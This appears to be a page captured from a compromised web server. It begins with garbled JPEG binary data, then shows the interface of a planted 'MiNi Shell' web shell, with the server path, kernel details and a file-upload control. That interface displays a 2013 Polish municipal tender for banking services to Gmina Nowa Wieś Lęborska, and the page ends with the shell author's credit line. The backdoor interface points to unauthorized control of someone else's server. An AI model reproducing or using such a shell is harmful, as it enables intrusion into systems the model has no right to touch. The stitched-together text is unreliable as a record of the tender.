JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131230/539348-N-2013.html

<p class="kh_header"><b>Nowa Wieś Lęborska: Obsługa bankowa budżetu Gminy Nowa Wieś Lęborska 
i jednostek organizacyjnych gminy</b><br>
<b>Numer ogłoszenia: 539348 - 2013; data zamieszczenia: 30.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowa Wieś Lęborska , ul. Grunwaldzka 24, 84-351 Nowa Wieś Lęborska, woj. pomorskie, tel. 059  8612428 w. 34, faks 059 8612164.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nwl.pl; http://bip.nwl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa bankowa budżetu Gminy Nowa Wieś Lęborska 
i jednostek organizacyjnych gminy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest obsługa bankowa budżetu Gminy Nowa Wieś Lęborska  i jednostek organizacyjnych gminy, zgodnie z zestawieniem poniżej:
-	Urząd Gminy w Nowej Wsi Lęborskiej,
-	Gminny Ośrodek Pomocy Społecznej w Nowej Wsi Lęborskiej,
-	Gminny Zakład Usług Komunalnych w Nowej Wsi Lęborskiej,
-	Zespół Szkół w Nowej Wsi Lęborskiej,
-	Zespół Szkół w Łebieniu,
-	Zespół Szkół w Garczegorzu,
-	Zespół Szkół w Leśnicach,
-	Zespół Szkół w Redkowicach
-	Przedszkole w Nowej Wsi Lęborskiej,
-	Biblioteka Publiczna Gminy Nowa Wieś Lęborska w Nowej Wsi Lęborskiej,
-	Gminny Ośrodek Kultury w Nowej Wsi Lęborskiej.
2. Zakres przedmiotu zamówienia obejmuje:
1. Otwarcie, likwidację i prowadzenie oprocentowanego rachunku bieżącego i oprocentowanych rachunków pomocniczych obejmujących budżet Gminy Nowa Wieś Lęborska i jednostek organizacyjnych Gminy oraz rachunków z funduszy specjalnych i celowych (w tym rachunków związanych z rozliczaniem środków otrzymanych z funduszy krajowych lub Unii Europejskiej i rachunku sum depozytowych).
2. Możliwość otwarcia i prowadzenia innych oprocentowanych rachunków bieżących i pomocniczych, których konieczność utworzenia powstanie po stronie Zamawiającego w trakcie obowiązywania umowy.
3. Umożliwienie usługi w ramach systemu OVERNIGHT - automatycznego przenoszenia środków na lokatę. Tworzenie lokaty OVERNIGHT następuje na koniec każdego dnia roboczego przy stanie środków powyżej 10.000,00 zł do pełnej wartości salda na rachunku bankowym.
4. Potwierdzenie otwarcia i zamknięcia rachunków bankowych.
5. Przyjmowanie wpłat gotówkowych i realizację wypłat gotówkowych.
6. Sporządzanie dziennych wyciągów bankowych ze wszystkich prowadzonych rachunków i ich udostępnianie przez bank w wersji papierowej lub elektronicznej. Wyciągi muszą identyfikować dokonane operacje i stwierdzać saldo otwarcia i zamknięcia rachunków.
7. Wydawanie blankietów czeków gotówkowych na wniosek Zamawiającego.
8. Wydawanie opinii i zaświadczeń bankowych na wniosek Zamawiającego.
9. Wydawanie historii rachunków na wniosek Zamawiającego.
10. Potwierdzanie sald rachunków bankowych. 
11. Umożliwienie upoważnionemu przez Zamawiającego pracownikowi wglądu w saldo rachunku jednostek organizacyjnych gminy.
12. Wdrożenie systemu elektronicznej obsługi rachunków bankowych łącznie z oprogramowaniem i przeszkoleniem personelu.
13. Realizację poleceń przelewów krajowych i zagranicznych w formie systemu bankowości elektronicznej.
14. Możliwość złożenia w banku przelewów w formie papierowej w sytuacjach gdy nie będzie możliwe dokonanie przelewu elektronicznie - bez dodatkowych opłat niezależnie od ilości przelewów.
15. Usługę wyzerowania wskazanych rachunków jednostek budżetowych gminy (z wyjątkiem instytucji kultury) polegającą na przekazaniu z dniem 31 grudnia każdego roku kwot pozostałych na tych rachunkach na wskazany rachunek gminy.
16. Udzielanie kredytu w rachunku bieżącym na pokrycie występującego w ciągu roku przejściowego deficytu budżetu gminy do wysokości określonej corocznie w uchwałach budżetowych do wysokości 1.000.000,00 zł (jeden milion) bez kosztów prowizji i opłat. Jedynym kosztem kredytu będą odsetki od faktycznie wykorzystanego kredytu. Kredyt oprocentowany będzie wg stawki WIBOR 1M powiększonego o marżę Wykonawcy w wysokości określonej w złożonej ofercie. Bank nalicza odsetki od faktycznie wykorzystanych środków kredytu w miesięcznych okresach obrachunkowych za okres faktycznego wykorzystania środków kredytu i obciąża nimi automatycznie rachunek Zamawiającego. Zamawiający nie dopuszcza możliwości pobierania opłat i prowizji od niewykorzystanej części kredytu. Spłata kredytu będzie następowała automatycznie z wpływów na rachunek bieżący budżetu. Całkowita spłata krótkoterminowego kredytu nastąpi najpóźniej do 31 grudnia danego roku budżetowego, a w każdym następnym roku budżetowym kredyt będzie dostępny na takich samych warunkach od pierwszego dnia roboczego nowego roku budżetowego. 
17 Siedziba, filia lub oddział banku w odległości nie większej niż 10 km od siedziby Urzędu Gminy w Nowej Wsi Lęborskiej, czynna co najmniej od poniedziałku do piątku w godzinach od 8:00 do 16.
18. Dyspozycje rozliczeniowe złożone przez Zamawiającego realizowane będą w godzinach od 8:00 do 15:30 (przelewy zaksięgowane pod datą złożenia dyspozycji).
19. Szacunkowe dane realizacji usług Zamawiającego (Gminy i jednostek organizacyjnych). Zamawiający zastrzega sobie prawo do rezygnacji z niektórych wskazanych usług bez ponoszenia w związku z tym dodatkowych opłat. 
19.1. Szacunkowa obsługa rachunków bankowych:
- 11 bieżących x 47 m-cy,
- 16 pomocniczych x 47 m-cy,
19.2. Ilość przelewów: 2 404 szt. Miesięcznie x 47 m-cy,
19.3. Wpłaty gotówkowe (odprowadzenie gotówki): 134 wpłat miesięcznie na kwotę 527.600 zł m-cznie,
19.4. Wypłaty gotówkowe (podjęcie gotówki): 43 wypłaty miesięcznie na kwotę 377.000 zł m-cznie,
19.5. Średni dzienny stan gotówki rachunku podstawowego budżetu gminy (saldo) - lokata overnight: 2.800.000 zł,
19.6. Średni stan gotówki na pozostałych rachunkach: 500.000 zł,
19.7. Instalacja programów do systemu elektronicznej obsługi rachunków bankowych: 13 stanowisk.
20. Bank zobowiązuje się do obsługi pracowników Urzędu i jednostek organizacyjnych gminy poza kolejnością, głownie dotyczy to wpłat i wypłat dokonywanych w kasie banku.
3. Warunki prawidłowej realizacji przedmiotu zamówienia:
1. Zamawiający zobowiązuje Wykonawcę do otwarcia, likwidacji i prowadzenia rachunków bankowych zgodnie z obowiązującymi w tym zakresie przepisami prawa.
2. Wykonawca zobowiązany jest zapewnić obsługę wpłat gotówkowych i wypłat gotówkowych dokonywanych przez Zamawiającego oraz jego jednostek i na rachunki Zamawiającego oraz jego jednostek.
3. Zamawiający wymaga, aby Wykonawca zapewnił nieodpłatnie: podłączenie do systemu elektronicznej obsługi bankowej, instalację niezbędnego oprogramowania i jego aktualizacji, a także przeszkolenie pracowników Zamawiającego w zakresie obsługi w/w systemu. Ponadto Wykonawca udostępni nieodpłatnie: licencje, wygeneruje certyfikaty, wyda karty kryptograficzne z czytnikiem i inne niezbędne urządzenia do funkcjonowania systemu bankowości elektronicznej. W przypadku awarii Zamawiający wymaga bezzwłocznego podjęcia działań, w celu zapewnienia sprawnej obsługi.
4. Wykonawca zapewni przeniesienie bazy danych z obecnie obsługiwanego systemu bankowości elektronicznej do systemu prowadzonego przez Bank.
5. W ramach systemu elektronicznej obsługi bankowej Wykonawca zapewni Zamawiającemu w szczególności:
5.1. Bezpieczeństwo danych w w/w systemie,
5.2. Jednoczesne funkcjonowanie wszystkich stanowisk w tym samym czasie,
5.3. Realizację zleceń płatniczych ze wszystkich rachunków bankowych w ramach dostępnych środków,
5.4. Składanie poleceń przelewu z datą przyszłą, z możliwością ich przeglądania, modyfikacji i usuwania przed wysłaniem do banku,
5.5. Możliwość uzyskania w czasie rzeczywistym pełnej informacji o wszystkich operacjach i saldach na rachunkach bankowych Zamawiającego,
5.6. Przeszukiwanie zbiorów wszystkich operacji na wszystkich rachunkach bankowych,
5.7. Tworzenie w systemie archiwum zrealizowanych zleceń płatniczych oraz wyciągów bankowych,
5.8. Generowanie potwierdzenia zrealizowanego przelewu oraz wyciągów bankowych niewymagających uwierzytelnienia bankowego,
6. Wykonawca zapewni sprawne funkcjonowanie systemu elektronicznej obsługi bankowej, najpóźniej od dnia 1 lutego 2014 roku od godz. 7:30 do dnia 31 grudnia 2017.
7. Zamawiający zastrzega sobie prawo lokowania wolnych środków pieniężnych na lokatach terminowych również w innych bankach, niż bank wybrany w ramach przedmiotowego postępowania o udzielenie zamówienia publicznego. Ewentualne gromadzenie środków na lokatach terminowych odbywać się będzie według dyspozycji Zamawiającego.
8. Opłaty przedstawione w ofercie obowiązywać będą niezmiennie przez cały czas trwania umowy bez możliwości ich waloryzacji.
9. Wykonawca nie będzie pobierał prowizji i opłat z tytułu:
9.1. Otwarcia, prowadzenia, likwidacji rachunków bankowych bieżących i pomocniczych oraz rachunków z funduszy specjalnych i celowych (w tym rachunków związanych z rozliczaniem środków otrzymanych z funduszy krajowych lub Unii Europejskiej i rachunku sum depozytowych).
9.2. Przelewów wewnątrzbankowych,
9.3. Sporządzania dziennych wyciągów bankowych ze wszystkich prowadzonych rachunków i ich udostępnienie przez bank w wersji elektronicznej bądź papierowej,
9.4. Wpłat gotówkowych na rachunki Zamawiającego,
9.5. Realizacji czeków z rachunku Zamawiającego,
9.6. Wydawania blankietów czeków gotówkowych,
9.7. Wydawanie zaświadczeń, opinii bankowych i zmiany karty wzorów podpisów oraz autoryzacji zleceń,
9.8. Za odnowienie kredytów w rachunku bieżącym,
9.9. Za niewykorzystanie części kredytu w rachunku bieżącym, 
9.10. Za wydanie promesy,
9.11. Opłat związanych z przygotowaniem rozpatrzenia wniosku o kredyt w rachunku bieżącym,
9.12. Za automatyczne przeniesienie środków na lokatę,
9.13. Za usługę wyzerowania wskazanych rachunków jednostek organizacyjnych na wskazane konto gminy,
9.14. Przelewów w formie papierowej w sytuacji niemożliwości dokonania przelewu elektronicznego.
9.15. Przyjmowanie wpłat gotówkowych od klientów Zamawiającego z tytułu podatków, opłat i innych dochodów należnych budżetowi gminy dokonywanych w siedzibie, filii bądź oddziale Banku..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, polegających na zakupie usług tego samego rodzaju do wysokości 10% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4, 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał zezwolenie do prowadzenia działalności bankowej zgodnie z ustawą z dnia 29 sierpnia 1997roku prawo bankowe ( Dz. U. z 2012r., poz.1376 ze  zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - Załącznik Nr 2 do SIWZ. Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - Załącznik Nr 2 do SIWZ. Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - Załącznik Nr 2 do SIWZ. Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie warunku oceniane będzie na podstawie treści złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - Załącznik Nr 2 do SIWZ. Ocena dokonana zostanie wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	 Oświadczenie o spełnianiu warunków udziału w postępowaniu - wypełniony Załącznik Nr 2 do SIWZ.
-	 Pełnomocnictwo do podejmowania zobowiązań w imieniu Wykonawcy - jeżeli umocowanie do reprezentowania i składania oświadczeń woli w imieniu Wykonawcy nie wynika z innych dokumentów załączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.75</li>
<li>2 - 5.2.	współczynnik oprocentowania środków pieniężnych gromadzonych na rachunkach bieżących  (Cob) - 0.08</li>
<li>3 - 5.3.	współczynnik oprocentowania środków pieniężnych gromadzonych na rachunkach pozostałych (Cop) - 0.05</li>
<li>4 - 5.4.	współczynnik oprocentowania środków pieniężnych gromadzonych na rachunkach bieżących umieszczanych na lokatach jednodniowych (OVERNIGHT) - 0.07</li>
<li>5 - Koszty od udzielonego kredytu w rachunku bieżącym na pokrycie występującego w ciągu roku przejściowego deficytu  (Ck) - 0.05</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w zakresie:
1.1.	Zmiany terminu realizacji wykonania zadania spowodowanego okolicznościami, których niemożna było wcześniej przewidzieć. 
1.2.	Strony dopuszczają dokonywanie zmian w niniejszej umowie, przy czym zmiany te nie będą wpływały na wysokość wynagrodzenia Wykonawcy. 
2. Warunki zmian:
a) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego
b) uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy,
c) forma zmian: aneks do umowy w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.nwl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Nowa Wieś Lęborska, 84-351 Nowa Wieś Lęborska, ul. Grunwaldzka 24.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2014 godzina 10:00, miejsce: Gmina Nowa Wieś Lęborska, 84-351 Nowa Wieś Lęborska, ul. Grunwaldzka 24 w pokoju nr 15 lub listownie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com